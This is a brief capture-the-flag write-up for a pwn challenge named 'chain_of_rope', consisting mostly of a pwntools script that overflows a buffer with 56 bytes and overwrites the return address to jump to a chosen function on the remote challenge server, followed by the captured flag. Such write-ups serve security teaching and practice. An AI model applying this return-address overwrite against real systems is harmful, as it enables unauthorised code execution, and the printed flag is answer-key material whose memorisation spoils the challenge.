Rating: 5.0
My solution could be called lazy as I cheated original idea how to solve it. I think it is self explanatory so I'll paste here my exploit.
```
from pwn import *
#c = process('./chain_of_rope')
c = remote('shell.actf.co',19400)
c.sendlineafter('?','1')
c.sendline('a'*+56+p64(0x401231))
c.interactive()
```
### actf{dark_web_bargains}